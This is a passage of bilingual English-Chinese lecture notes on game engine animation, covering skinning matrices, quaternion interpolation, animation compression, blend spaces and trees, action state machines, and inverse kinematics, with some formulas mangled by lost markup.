    ​$M^m_J$:模型空间中关节 $J$ 的姿势

    • Walking the skeletal hierarchy from $J$ to the root:

      从 $J$ 到根遍历骨架层次结构:

    $$M_{j}{m}=\prod_{j=J}{0}M_{p(j)}^{l}$$

    Joint Pose interpolation-Local Space vs.Model Space

    ​关节姿态插值-局部空间与模型空间

    webp

    Local Space

    ​局部空间

    • Less data with delta transform

      通过增量变换减少数据

    • Convenient for interpolation or blend

      方便插值或混合

    webp

    Model Space

    ​模型空间

    • Incorrect for interploation

      插值不正确

    Single joint Skinning

    ​单关节蒙皮

    webp

    Vertex $V$'s position in joint $J$'s local space is fixed

    ​顶点 $V$ 在关节 $J$ 的局部空间中的位置是固定的

    Attach the vertices of a mesh to a posed skeleton

    ​将网格的顶点附加到已摆好姿势的骨架上

    • Each vertex can be bound to one or more joints with a weight parameter

      每个顶点可以通过权重参数绑定到一个或多个关节

    • The vertex position in each bound joint’s local space is fixed

      每个绑定关节局部空间中的顶点位置是固定的

    Skinning Matrix

    ​蒙皮矩阵

    webp

    Bind Pose: the skeleton pose for binding

    绑定姿势:绑定的骨骼姿势

    For a mesh vertex $V$ which is bound to a joint $J$

    ​对于绑定到关节 $J$ 的网格顶点 $V$

    • $V^m_b$: $V$'s position in model space within bind pose

      $V^m_b$:$V$ 在模型空间绑定姿势中的位置

    • $V^l_b$ : $V$'s position in local space within bind pose

      $V^l_b$ :$V$ 在绑定姿势局部空间中的位置

    • $M^m_{b(j)}$: $J$'s pose in model space within bind pose

      $M^m_{b(j)}$:$J$ 在模型空间中的绑定姿势内的姿势

    $V$'s position in local space at any time $t$ is fixed as

    ​$V$ 在任何时刻 $t$ 在 局部空间 中的位置固定为

    $$V’(t)\equiv V’b=(M{b(J)}m){-1}\cdot V_b^m$$


    $M^m_j(t)$: joint $J$'s pose in model space at time $t$

    ​$M^m_j(t)$:$J$ 在 $t$ 时刻在模型空间中的姿势

    $$M_jm(t)=\prod_{j=J}0M’_{p(j)}(t)$$

    $V^m(t)$: $V$'s position in model space at time $t$

    ​$V^m(t)$:$V$ 在 $t$ 时刻在模型空间中的位置

    $$Vm(t)=M_jm(t)\cdot V_j1=M_jm(t)\cdot(M_{b(J)}m){-1}\cdot V_b^m$$

    • $M_jm(t)\cdot(M_{b(J)}m)^{-1}$: Inverse Bind Pose Matrix

    Skinning Matrix:

    $$K_j=M_jm(t)\cdot(M_{b(J)}m)^{-1}$$

    Representing a Skeleton in Memory

    ​代表内存中的骨骼

    • The name of the joint, either as a string or a hashed 32-bit string id

      关节的名称,可以是字符串,也可以是散列的 32 位字符串 ID

    • The index of the joint’s parent within the skeleton

      骨骼中关节父级的索引

    • The inverse bind pose transform is the inverse of the product of the translation, rotation and scale

      逆绑定姿势变换是平移、旋转和缩放乘积的逆

    struct Joint {
    const string m_joint name; // the name of joint
    UInt8m_parent_joint_index; // the index of parent joint or 0xFF if root
    Translation m_bind_pose_translation; // bind pose:translation
    Rotation m_bind_pose_rotation; // bind pose:scale
    Matrix4X3m_inverse_bind_pose_transform; // inverse bind pose 可以通过计算得到,不过为了节省时间,事先算好
    }

    struct Skeleton {
    UInt m_joint_count; // number of iointsm joints
    Joint m_joints[]; // array of joints
    };

    Skinning Matrix Palette

    ​蒙皮矩阵调色板

    An array of skinning matrices for each joint

    ​每个关节的蒙皮矩阵数组

    • To be used by GPU in shaders

      由 GPU 在着色器中使用

    • Optimization: count the transform matrix $M^W$ for model space to world space

      优化:计算 模型空间 到世界空间的变换矩阵 $M^W$

      The optimized skinning matrix of joint $J$ is

      关节 $J$ 的优化蒙皮矩阵

    $$K’_j=M^w\cdot M_jm(t)\cdot(M_{b(J)}m)^{-1}$$

    Weighted Skinning with Multi-joints

    ​多关节加权蒙皮

    webp

    For a mesh vertex $V$ which is bound to $N$ joints

    ​对于绑定到 $N$ 关节的网格顶点 $V$

    • $W_i$: the Skinning Weight of the $i$-th bound joint

      $W_i$:第 $i$ 个绑定关节的蒙皮权重

    Weighted Skinning Blend

    ​加权蒙皮混合

    webp

    For a vertex $V$ which is bound to $N$ joints $J_0$ to $J_{N-1}$

    ​对于绑定到 $N$ 关节 $J_0$ 到 $J_{N-1}$ 的顶点 $V$

    • $K_{j_{i}}(t)$: the skinning matrix of joint $J_i$ at time $t$

      $K_{j_{i}}(t)$:关节 $J_i$ 在时间 $t$ 的蒙皮矩阵

    Transform $V$'s position in joint $J$'s local space to model space:

    ​将 $V$ 在关节 $J$ 的 局部空间 中的位置转换为 模型空间

    $$V_{J_i}^m(t)=K_{J_i}(t)\cdot V_{b(J_i)}^m$$

    $V$'s position in model space:

    ​$V$ 在模型空间中的位置:

    $$Vm(t)=\sum_{i=0}{N-1}W_i\cdot V_{j_i}^m(t)$$

    Clip

    webp

    A sequence of skeleton poses

    ​一系列骨骼姿势

    Interpolation between Poses

    ​姿势之间的插值

    webp

    • Animation’s timeline is continuous

      动画的时间线是连续的

    Interpolation

    ​插值

    webp

    • Calculate the pose between key poses

      计算关键姿势之间的姿势

    Simple lnterpolation of Translation and Scale

    ​平移和比例的简单插值

    • Linear interpolation (LERP)

      线性插值(LERP)

      $f(x)=(1-\alpha)f(x_1)+\alpha f(x_2)$

      $\alpha=\frac{x-x_1}{x_2-x_1},x_1<x_2,x\in[x_1,x_2]$

    webp

    Translation:

    $$T(t)=(1-\alpha)T(t_1)+\alpha T(t_2)$$

    Scale:

    $$S(t)=(1-\alpha)S(t_1)+\alpha S(t_2)$$

    Quaternion interpolation of Rotation

    ​旋转的四元数插值

    webp

    • NLERP for quaternion

      四元数的 NLERP

      • Liner interpolation

        线性插值

        $q_t=\mathrm{Lerp}(q_{t1},q_{t2},t)=(1-\alpha)q_{t1}+\alpha q_{t2}$

        $a=\frac{t-t_1}{t_2-t_1},t_1<t_2,t\in[t_1,t_2]$

      • Normalization

        归一化

        $q_t’=\mathrm{Nlerp}(q_{t1},q_{t2},t)=\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}$

    Shortest Path Fixing of NLERP

    • The shortest path

    webp

    $$q_t=\begin{cases}\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}&q_{t1}\cdot q_{t2}\geq0\\frac{(1-\alpha)q_{t1}-\alpha q_{t2}}{||(1-\alpha)q_{t1}-\alpha q_{t2}||}&q_{t1}\cdot q_{t2}<0\end{cases}$$

    $$\begin{aligned}&q_{t1}=a+bi+cj+dk\&q_{t2}=e+fi+gj+hk\end{aligned}$$

    解得:

    $$\begin{aligned}
    q_{t1}\cdot q_{t2}& =ae+bf+cg+dh \
    &=\cos(\theta)||q_{t1}|||||q_{t2}||
    \end{aligned}$$

    webp

    Problem of NLERP

    webp

    Non-constant angular speed of NLERP

    ​NLERP 非恒定角速度

    SLERP: Uniform Rotation Interpolation

    ​SLERP:均匀旋转插值

    webp

    SLERP for quaternion

    ​四元数的 SLERP

    $$\begin{aligned}&q_t=\mathrm{Sler}p(q_{t1},q_{t2},t)=\frac{\sin\left((1-t)\theta\right)}{\sin\left(\theta\right)}\cdot q_{t1}+\frac{\sin\left(t\theta\right)}{\sin\left(\theta\right)}\cdot q_{t2}\&\theta=\arccos(q_{t1}\cdot q_{t2})\end{aligned}$$

    ​用到了反三角函数,计算速度慢。

    NLERP vs. SLERP

    webp

    • NLERP

      • Non-constant angular speed

        非恒定角速度

      • Almost constant angular speed when $\theta$ is small

        当 $\theta$ 很小时,角速度几乎恒定

    • SLERP

      • Constant angular speed

        恒定角速度

      • May have zero-divide problem when $\theta$ is small

        当 $\theta$ 很小时可能会出现零除问题

    • Combination

      • Widely used in 3A-game development

        广泛应用于 3A 游戏开发

      • Use SLERP when $\theta$ is large, and NLERP when $\theta$ is almost zero

        当 $\theta$ 很大时使用 SLERP,当 $\theta$ 几乎为零时使用 NLERP

    Simple Animation Runtime Pipeline

    webp

    ​在 CPU 计算好变换后的动作,剩下的交给 GPU。

    Animation Compression

    ​动画压缩

    Animation Clip Storage

    ​动画剪辑存储

    webp

    • Animation clip split to seperated joint pose sequences

      动画剪辑分割为单独的关节姿势序列

    • Joint pose sequence splits to seperated translation, rotation and scale tracks

      关节姿势序列分割为单独的平移、旋转和缩放轨道

    Animation Data Size

    ​动画数据大小

    • Single clip size estimation

      单个剪辑尺寸估计

    webp

    e.g. To develop a game containing over 150 unique character,like League of Legends,each of these has 30 clips with length about 5sIt takes about: 1.26~2.51GB

    ​例如开发一款包含超过 150 个独特角色的游戏,例如英雄联盟,每个游戏有 30 个长度约为 5 秒的剪辑,大约需要:1.26~2.51GB

    Distinction among Animation Tracks

    ​动画轨道的区别

    For the same joint, rotation, translation and scale changes vary greatly

    ​对于同一个关节,旋转、平移和尺度变化差别很大

    webp

    Distinction among Joints

    ​关节的区别

    webp

    The motion of different joints varies greatly

    ​不同关节的运动差异很大

    Simplest Compression -DoF Reduction

    ​最简单的压缩 - 自由度缩减(一般骨骼动画只有关节的旋转)

    • Scale

      缩放

      • Discard scale track (Usually not changed in humanoid skeleton except facial joints)

        丢弃比例轨迹(除面部关节外,人形骨骼中通常不会改变)

    • Translate

      平移

      • Discard translate track (Usually not changed in humanoid skeleton except the pelvis, facial joint and other specialolnts)

        丢弃平移轨迹(除了骨盆、面部关节和其他特殊部位外,人形骨骼中通常不改变)

    Keyframe

    webp

    A key frame (or keyframe) in animation and filmmaking is a drawing or shot that defines the starting and ending points of any smooth transition

    ​动画和电影制作中的关键帧是定义任何平滑过渡的起点和终点的绘图或镜头

    Keyframe Extraction - Linear Keys Reduction

    ​关键帧提取 - 线性关键点缩减

    webp

    ​Remove those frames which can be fitted by linear interpolation of adjacent frames

    ​删除那些可以通过相邻帧线性插值拟合的帧

    KeyFrame = {}
    for i = 1 to n-1 do
    frame_interp = Lerp(frame[i-1],frame[i+1])
    error = Diff(frame[i],frame_interp)
    if isNotAcceptable(error) then
    KeyFrame.insert(frame[i])
    end
    end

    Catmul-Rom Spline

    ​Catmul-Rom 样条线(有损压缩)

    webp

    Four control points $P_0$, $P_1$, $P_2$, $P_3$, will make a curve from $P_1$ to $P_2$

    ​四个控制点 $P_0$、$P_1$、$P_2$、$P_3$ 将形成一条从 $P_1$ 到 $P_2$ 的曲线

    • $\alpha$ : affects how sharply the curve bends at control points (usually $\alpha=0.5$)

      $\alpha$:影响曲线在控制点处的弯曲程度(通常$\alpha=0.5$)

    • $t$: the interpolation coefficient

      $t$:插值系数

    Interpolate on the curve with $t$ in range $(0,1)$

    ​在曲线上使用 $t$ 在 $(0,1)$ 范围内进行插值

    $$P(t)=[1\quad t\quad t^2\quad t^3]\begin{bmatrix}0&1&0&0\-\alpha&0&\alpha&0\2\alpha&\alpha-3&3-2\alpha&-\alpha\-\alpha&2-\alpha&\alpha-2&\alpha\end{bmatrix}\begin{bmatrix}P_0\P_1\P_2\P_3\end{bmatrix}$$

    webp

    Fitting Process

    • Make a Catmull-Rom spline with the middle 2 control points at both ends of the original curve

      制作一条 Catmull-Rom 样条线,中间 2 个控制点位于原始曲线的两端

    • lteratively add control points like binary search

      交替添加控制点,如二分搜索

    • Calculate inner curve by the most closet 4 points

      通过最接近的 4 个点计算内曲线

    • Repeat until the error of each frame is under the threshold

      重复直到每帧的误差低于阈值

    Float Quantization

    Use less bits integer to represent limited range and accuracy float value

    ​使用较少位的整数来表示有限范围和精度的浮点值

    $$DesiredBits=[log_2\frac{Range}{Accuracy}]$$

    Example Translation Range $[0, 10]$, Accuracy 0.001m:

    ​示例变换范围 $[0, 10]$,精度 0.001m:

    $$DesiredBits=\lceil\log_2\frac{10}{0.001}\rceil=14bits$$

    In general, 16 bits can cover pose’s float range and accuracy requirements in the game engine

    ​一般来说,16 位可以覆盖游戏引擎中 pose 的浮动范围和精度要求

    Example of linear quantizing a 32bit float to a 16bit unsigned integer.

    ​将 32 位浮点数线性量化为 16 位无符号整数的示例

    webp

    Quaternion Quantization

    ​四元数量化

    • 3 numbers is enough to represent a unit quaternion like $q= (a,b,c, 1- (a^2+ b^2 + c^2))$

      3 个数字足以表示一个单位四元数,例如 $q= (a,b,c, 1- (a^2+ b^2 + c^2))$

    • The range of the rest 3 numbers could be limited in $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ , if always omitingthe number with largest absolute value

      其余 3 个数字的范围可以限制在 $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ 中,如果总是省略绝对值最大的数字

    $$a2+b2+c2+d2=1,|a|\geq\max(|b|,|c|,|d|)$$

    $$2b2<a2+b2<a2+b2+c2+d^2=1$$

    $$b^2\leq\frac12\Rightarrow-\frac1{\sqrt2}\leq b\leq\frac1{\sqrt2}$$

    Similarly 类似地, $-\frac1{\sqrt{2}}\leq c\leq\frac1{\sqrt{2}}$ and $-\frac1{\sqrt{2}}\leq d\leq\frac1{\sqrt{2}}$

    webp

    • Use 2 bits to represent which number is discard

      使用 2 位来表示哪个数字被丢弃

    • Use 15 bits storage for each number, ranged in $\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$, precision $\sqrt2/32767≈0.000043$

      每个数字使用 15 位存储,范围为$\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$,精度$\sqrt2/32767≈0.000043$

    • Finally a quaternion could store in a 48 bits storage, cutting down from 128 bits

      最终四元数可以存储在 48 位存储器中,从 128 位减少

    Size Reduction from Quantization

    ​量化的尺寸减小

    webp

    • The key point of quantization is to find a proper error threshould, and use as less bits of storage as possible

      量化的关键是找到合适的误差阈值,并使用尽可能少的存储位

    • Keyframe and quantization can use together to obtain a better compression ratio

      关键帧和量化可以一起使用以获得更好的压缩比

    Error Propagation

    ​错误传播

    webp

    Error cuased by compression of animation data will accumulate between bones

    ​动画数据压缩引起的误差会在骨骼之间累积

    • Bones store local space transformation data

      骨骼存储局部空间变换数据

    • Bones are organized by hierachy

      骨骼按层次结构组织

    Joint Sensitivity to Error

    ​联合错误敏感性

    Some special parts require high precision animation.

    ​一些特殊零件需要高精度的动画。

    webp

    ​由动画有损压缩导致的动画错误。

    Measuring Accuracy - Data Error

    ​测量精度 - 数据错误

    webp

    Calculate the error with the diff between the interpolated transform data and the origin

    ​计算插值变换数据与原点之间的差异的误差

    • Translation Error: $||T_1-T_2||$
    • Rotation Error: $||R_1-R_2||$
    • Scale Error: $||S_1-S_2||$

    Measuring Accuracy - Visual Error

    ​测量精度 - 视觉误差

    webp

    Calculate the error with the diff betweent the interpolated vertex and the desired vertex

    ​计算插值顶点与所需顶点之间的差异的误差

    webp

    Hard to cacluate the visual error of every vertex

    ​很难计算每个顶点的视觉误差

    • Great amount of calculation

      计算量大

    Estimate the visual error

    ​估计视觉误差

    • Fake vertex: Two orthogonal virtual vertices at a fixed distance from the joint (not co-linear with the joint rotation axis)

      假顶点:距关节固定距离的两个正交虚拟顶点(与关节旋转轴不共线)

    • Fake Vertex Distance Approximation

      假顶点距离近似

      • character bones 2~10cm

        人物骨头 2~10 厘米

      • large animated objects 1~10m

        大型动画物体 1~10m

    Error Compensation - Adaptive Error Margins

    ​误差补偿 - 自适应误差裕度

    webp

    • Adaptive Error Margins

      自适应误差容限

      • Use different accuracy threshold for different joint from end to root, in order to reduce error caused by parent joint

        对从头到尾的不同关节使用不同的精度阈值,以减少父关节引起的误差

    Error Compensation - in Place Correction

    ​误差补偿 - 就地校正

    webp

    • Process

      过程

      • Select a point on every bone except root

        在除根部之外的每个骨骼上选择一个点

      • Compute the rotation of every compressed bone from root that takes the tagged point closet to its actual position in model space

        计算从根部开始的每个压缩骨骼的旋转,使标记点最接近其在模型空间中的实际位置

      • Add the rotation to transform of compressed data

        添加旋转来转换压缩数据

    • Pros

      优点

      • No Overhead during decompression period since all data already computed during compression

        解压期间没有开销,因为所有数据已在压缩期间计算

    • Cons

      缺点

      • May produce memory overhead because of possible modification to ConstantTrack

        由于可能对 ConstantTrack 进行修改,可能会产生内存开销

      • May produce NoiseTrack because it directly changes keyframe data

        可能会产生 NoiseTrack,因为它直接更改关键帧数据

      • Compression may cost more time

        压缩可能会花费更多时间

    Animation DCC Process

    In general, the Animation DcC (Digital Content Creating) process includes:

    ​一般来说,动画 DcC(数字内容创建)过程包括:

    • Mesh

      网格

    • Skeleton binding

      骨骼绑定

    • Skinning

      蒙皮

    • Animation creation

      制作动画

    • Exporting

      输出

    Mesh building

    webp

    • Blockout Stage: Create a rough outline of the character

      草图阶段:创建角色的粗略轮廓

    • High Poly Stage: improve the building precision

      高多边形阶段:提高模型精度

    • Low Poly Stage: Divide the surface into meshes

      低多边形阶段:将表面划分为网格

    • Texture Stage: Add texture to character

      纹理阶段:为角色添加纹理

    Mesh Adjustment for Animation

    ​动画的网格调整

    webp

    • Mesh dividing is vital for animation creating, it defines how the skin curves

      网格划分对于动画创建至关重要,它定义了皮肤的弯曲方式

    • Animation turns to be weird if the meshes are too sparse

      如果网格太稀疏,动画会变得很奇怪

    • Dense meshes cause a performance overhead

      密集的网格会导致性能开销

    Exporting

    webp

    • FBX file
      • Model mesh
      • skeleton
      • skinning data
      • animation clip

    FBX: the industry-standard 3D asset exchange file format for games. lt isdeveloped by Autodesk as a proprietary format.

    ​FBX:游戏的行业标准 3D 资产交换文件格式。它是由 Autodesk 开发的专有格式。

    第九节:高级动画技术:动画树、IK 和表情动画

    Animation System

    Advanced Animation Technology

    ​高级动画技术

    How to Achieve the Animation Effect in Real Game?

    ​如何实现真实游戏中的动画效果?

    webp

    ​将动画师制作的各种 simple animation clips 混合成 complex animations。

    Animation Blending

    • The term animation blending refers to any technique that allows more than one animation clip to contribute to the final pose of the character

      术语“动画混合”是指允许多个动画剪辑为角色的最终姿势做出贡献的任何技术

    Case: Walking to Running

    webp

    • Assume the character walks at 1.5m/s and runs at 3.0m/s in our game

      假设角色在我们的游戏中以 1.5m/s 的速度行走并以 3.0m/s 的速度奔跑

    • As the character’s speed increase, we want to switch its animation from walking to running

      随着角色速度的增加,我们希望将其动画从步行切换为跑步

    Math of Blending: LERP

    webp

    Use LERP to get intermediate frame from poses of different clips

    ​使用 LERP 从不同剪辑的姿势中获取中间帧

    Weight is controlled by game parameters, i.e, character speed

    ​重量由游戏参数控制,即角色速度

    Calculate Blend Weight

    ​计算混合权重(依据速度)

    参数描述
    $\text{speed}_{\text{current}}$current speed
    $\text{speed}_{\text{1}}$speed of clip1
    $\text{speed}_{\text{2}}$speed of clip2
    $\text{weight}_1$calculated weight of clip1
    $\text{weight}_2$calculated weight of clip2

    $$weight_1=\frac{speed_{current}-speed_2}{speed_1-speed_2}$$

    $$\mathrm{weight}2=\frac{\mathrm{speed}{current}-\mathrm{speed}_1}{\mathrm{speed}_2-\mathrm{speed}_1}$$

    Align Blend Timeline

    ​对齐混合时间线

    webp

    Case: Walking to Running

    In order to achieve the desired effect, we need a lot of animation clips with intermediate speeds.

    ​为了达到想要的效果,我们需要大量中等速度的动画片段。

    Let the animators produce a whole bunch?

    ​让动画师制作一大堆?(这是不可能的)

    Blend Space

    ​混合空间

    1D Blend Space: Directional Movement

    ​一维混合空间:定向运动

    webp

    Players can move forward from multiple angles

    ​玩家可以从多个角度前进

    We can blend any angle from three clips:

    ​我们可以混合三个剪辑中的任意角度:

    • Strafe Left clip
    • Run Forward clip
    • Strafe Right clip

    The technique is called 1D Blend Space.

    ​该技术称为一维混合空间。

    Directional Walking and Running

    ​定向步行和跑步

    webp

    Players can change direction and speed at the same time

    ​玩家可以同时改变方向和速度

    We simply place the two 1D Blend Spaces orthogonally and we get an 2D Blend Space

    ​我们只需将两个一维混合空间正交放置,就得到一个二维混合空间

    2D Blend Space

    webp

    Since the movement speed in the lateral direction is lower in the forward direction, the character should enter the running state in a lower speed in the lateral direction

    ​由于横向移动速度在前进方向上较低,因此角色应该以较低的横向速度进入奔跑状态

    Case: Applauding on Different Poses

    ​案例:不同姿势鼓掌

    webp

    There are multiple robots in different poses in the scene

    ​场景中有多个机器人摆出不同的姿势

    We need to make applause animations for various poses separately

    ​我们需要分别为各种姿势制作掌声动画

    Is it possible to make a single applauding animation that can be applied to all poses?

    ​是否可以制作一个可以应用于所有姿势的鼓掌动画?

    Skeleton Masked Blending

    ​骨架蒙版混合

    webp

    The set of all blend percentages for the entire skeleton ${\beta_j}|^{N-1}_{j=0}$ is sometimes called a blend mask $b$

    ​整个骨架的所有混合百分比的集合 ${\beta_j}|^{N-1}_{j=0}$ 有时称为混合蒙版 $b$

    Case: Warm Welcome from the Robots

    ​案例:机器人的热烈欢迎

    webp

    We will let robots applauding in different poses

    ​我们会让机器人以不同的姿势鼓掌(用蒙版结合两个动画 clips)

    Additive Blending

    webp

    Add a difference clip into a regular clip to produce a new clip

    ​将差异剪辑添加到常规剪辑中以生成新剪辑

    Additive Blending introduces a new kind of animation called a difference clip, which represents the difference between two regular animation clips.

    ​添加剂混合引入了一种称为差异剪辑的新型动画,它表示两个常规动画剪辑之间的差异。

    A difference clip can be added into a regular animation clip in order to produce interesting variations in thepose and movement of the character.

    ​可以将差异剪辑添加到常规动画剪辑中,以便在角色的姿势和运动中产生有趣的变化。

    Nodding to Camera

    webp

    ​朝向摄像机点头的动画。

    Additive Blending - Abnormal Bone Results

    ​添加剂混合 - 骨骼结果异常

    webp

    Additive blends are more likely to have abnormal bone results

    ​添加剂混合物更有可能产生异常的骨骼结果

    Animation Blending Summary

    ​动画混合总结

    webp

    • 1D Blend Space

      一维混合空间

      • Blend poses based on a single input value

        基于单个输入值混合姿势

    • 2D Blend space

      • Blend poses based on two input values

        基于两个输入值混合姿势

      • Triangular blend

        三角形混合

    • Masked Blending

      蒙版混合

    • Additive Blending

      添加剂混合

    Action State Machine (ASM)

    ​有限动画状态机

    Case: Jumping

    webp

    How to animate jump?

    ​如何制作跳跃动画?

    Blend Space is synchronous, but jump is stateful

    ​混合空间是同步的,但跳跃是有状态的

    We usually model the jumping action via a finite state machine, commonly known as the Action State Machine (ASM)

    ​我们通常通过有限状态机(通常称为动作状态机(ASM))来模拟跳跃动作

    ASM Definition

    ​ASM 定义

    webp

    • ASM consists of nodes and transitions

      ASM 由节点和转换组成

    • Node types

      节点类型

      • Blend space

        混合空间

      • Clip

        片段

    class ActionstateMachineclipNode
    {
    Animationclip m_clip;
    bool m_is_loop;
    };

    class ActionstateMachineBlendSpaceNode
    {
    Blendspace m_blend_space;
    bool m_is_loop;
    };
    • Transition type

      过渡型

      • simply “pop" from one state to another

        只需从一种状态“弹出”到另一种状态

      • cross-fade from one state to the next

        从一种状态交叉淡入淡出到另一种状态

      • Special transitional states

        特殊过渡状态

    Cross Fades

    ​交叉淡入淡出

    webp

    Two common ways

    ​两种常见方式

    • Smooth transition

      平稳过渡

      • restriction: the two clips must be looping animations, and their timelines must be synchronized

        限制:两个剪辑必须是循环动画,并且它们的时间线必须同步

    • Frozen transition

      冻结过渡

    Cross Fades Curve

    webp

    Different cross fades curve could be used for different demands

    ​不同的交叉淡入淡出曲线可用于不同的需求

    Animation State Machine in Unreal

    ​虚幻中的动画状态机

    webp

    • State: a blueprint graph which outputs a pose

      状态:输出姿势的蓝图

    • Transition : control when to change state and how to blend (Multi)

      过渡:控制何时改变状态以及如何混合(多)

    Layered ASM

    ​分层状态机

    webp

    different parts of a character’s body to be doing different, independent or semi-independent actions simultaneously

    ​角色身体的不同部位同时做不同的、独立或半独立的动作

    Animation Blend Tree

    ​现代游戏引擎常用的方法——动画混合树

    Blend Tree

    ​混合树

    webp

    Structure layered ASMs and operations as a tree

    ​将分层 ASM 和操作构建为树

    • Inspired by expression tree

      受到表达式树的启发

    • Easy to understand for animators

      动画师易于理解

    For a blend tree

    ​对于混合树

    • Non-terminal nodes and terminal nodes (leaf nodes)

      非终端节点和终端节点(叶节点)

    • The result of each non-terminal node is a pose

      每个非终端节点的结果是一个位姿

    LERP Blend Node

    ​LERP 混合节点

    webp

    • Binary LERP node

      二进制 LERP 节点

      • Basic non-terminal node in blend tree

        混合树中的基本非终端节点

      • LERP two input poses with weight $\beta$ into one output pose

        LERP 将权重 $\beta$ 的两个输入姿势转化为一个输出姿势

    Usually extended to handle multiple inputs(e.g. Ternary/Quad LERP node)

    ​通常扩展为处理多个输入(例如三元/四元 LERP 节点)

    Additive Blend Node

    ​加法混合节点

    webp

    • Basic non-ternimal node in blend tree

      混合树中的基本非终止节点

    • Add the second input pose (usually a difference one) into the first input pose by weight $\beta$

      按权重 $\beta$ 将第二个输入姿势(通常是差异姿势)添加到第一个输入姿势中

    Express Layered ASM in Blend Tree

    ​在混合树中表达分层 ASM

    webp

    Use a blend tree to describe the desired final pose of ASMs

    ​使用混合树来描述 ASM 所需的最终姿态

    Blend Tree Nodes

    ​混合树节点

    webp

    Terminal node (Leaf Nodes)

    ​终端节点(叶节点)

    • Clip
    • Blend Space
    • ASM

    Non-terminal node (No-Leaf Nodes)

    ​非终端节点(No-Leaf Nodes)

    • Binary LERP blend node

      二进制 LERP 混合节点

    • Ternary (triangular) LERP blend node

      三元(三角形)LERP 混合节点

    • Binary additive blend node

      二元加法混合节点

    Unreal Animation Blueprint

    ​虚幻动画蓝图

    webp

    A blueprint graph which outputs a final pose

    ​输出最终姿势的蓝图

    • Take clip poses or the results of ASMs as input

      将剪辑姿势或 ASM 结果作为输入

    • Blend input poses by different methods

      通过不同的方法混合输入姿势

    Bend Tree Control Parameters

    ​弯曲树控制参数

    • node search

      节点搜索

      provide a way for higher-level code to find blend nodes in the tree

      为高层代码提供一种在树中查找混合节点的方法

    • named variable

      命名变量

      allow names to be assigned to the individual control parameters. The controlling code can look up a control parameter by name in order to adjust its value

      允许为各个控制参数分配名称。控制代码可以通过名称查找控制参数以调整其值

    • control structure

      控制结构

      a simple data structure, contains all of the control parameters for the entire character. The nodes in the blend tree(s) are connected to particular control parameters

      一个简单的数据结构,包含整个角色的所有控制参数。混合树中的节点连接到特定的控制参数

    Animation blend tree is way more complicated that those classic notes (i,e, event nodes, calculation/logic nodes and special blending and flow control nodes)

    ​动画混合树比那些经典注释(即事件节点、计算/逻辑节点以及特殊混合和流程控制节点)要复杂得多。

    Unreal Animation Blueprint Control

    ​虚幻动画蓝图控制

    webp

    Named variables as members in animation blueprint

    ​命名变量作为动画蓝图中的成员

    • Can be updated through blueprint

      可以通过蓝图进行更新

    • Can be used anywhere inside the Blend Tree

      可以在混合树内的任何地方使用

    Unreal5 Animation Tree Sample

    webp

    Inverse Kinematices (IK)

    ​逆运动学 (IK)

    Basic Comcepts

    webp

    • End-effector

      末端执行器

      The bone which is expected to be movedto a desired position

      预计将移动到所需位置的骨骼

    • lK (inverse kinematics)

      lK(逆运动学)

      The use of kinematic equations to determine the joint parameters of a manipulator so that the end-effector moves to a desired position

      利用运动学方程确定机械手的关节参数,使末端执行器移动到所需位置

    • FK (Forward Kinematics)

      FK(正向运动学)

      The use of the kinematics equations of a robot to compute the position of the end-effectors from specified values for the joint parameters

      使用机器人的运动学方程根据关节参数的指定值计算末端执行器的位置

    How to Touch the Ground?

    webp

    ​让角色踏入凹凸不平的地面时,脚能正确踏在地面上。

    Intuitive ldea: Adjust Feet Position for Each Step

    ​直观想法:每一步调整脚的位置

    Two Bones IK

    webp

    ​在脚和低面建立 IK 约束。

    • 3D space

    webp

    • Determine the final pose by a reference vector

      通过参考向量确定最终姿态

    webp

    More Complicated IK Scenarios

    ​更复杂的 IK 场景

    webp

    Complexity of Multi-Joint lK Solving

    ​多关节 lK 求解的复杂性

    webp

    • Computation cost: high dimension non-linear function solving in real-time

      计算成本:实时求解高维非线性函数

    • May have multiple solutions, unique solution or nosolution

      可能有多种解决方案、唯一解决方案或无解决方案

    Check Reachability of the Target

    ​检查目标的可达性

    webp

    Constraints of Joints

    webp

    ​人体的关节有多种,不同的关节能做出不同范围的变换。

    ​哦!游戏引擎开发者还要对解剖学有所涉猎。

    Need Treat Constraints Seriously

    ​需要认真对待约束

    webp

    ​约束不充分,游戏中出现反关节运动。

    Heuristics Algorithm

    ​启发式算法

    Why

    • Too many joints + constraints, difficult to solve with analysis method

      关节 + 约束过多,难以用分析方法解决

    Basic ldea

    ​基本思想

    Designed to solve problem in faster and more efficient fashion by sacrificing optimality, accuracy, precision, or completeness for speed

    ​旨在通过牺牲最优性、准确性、精密度或完整性来换取速度,以更快、更高效的方式解决问题

    • Approximation

      近似值

    • Global optimality is not guaranteed

      不保证全局最优

    • lteration is usually used with a maximum limit

      迭代通常使用最大限制

    CCD (Cyclic Coordinate Decent)

    ​CCD(循环坐标系)

    Principle

    • From joint-to-joint, rotates the end-effector as close as possible to the target, solves lK problem in orientation space

      从关节到关节,旋转末端执行器尽可能靠近目标,解决方向空间中的 lK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    Contraints

    ​限制条件

    • Angular limits is allowed, by checking after each iteration

      通过在每次迭代后检查,允许角度限制

    Optimized CCD (1/2)

    ​优化 CCD (1/2)

    webp

    Add tolerance regions to each bone’s goal

    ​为每个骨骼的目标添加容差区域

    • Each bone stops rotating and moves onto the next bone within tolerance region

      每个骨骼停止旋转并移动到公差范围内的下一个骨骼

    • Helps to produce poses that are less rigid and more comfortable looking

      有助于塑造不那么僵硬且看起来更舒适的姿势

    Optimized CCD (2/2)

    webp

    Use under-damped angle scaling

    ​使用欠阻尼角度缩放

    • Each ioint moves only a small amount toward the goal and distributes the movement across multiple bones

      每个关节仅向目标移动少量,并将移动分布到多个骨骼上

    • Produce less abrupt joint changes and more smooth and casual poses for character movement

      减少突然的关节变化,并为角色运动提供更平滑和随意的姿势

    FABRlK (Forward And Backward Reaching Inverse kinematics)

    ​FABRlK(向前和向后到达逆运动学)

    webp

    Principle

    ​原则

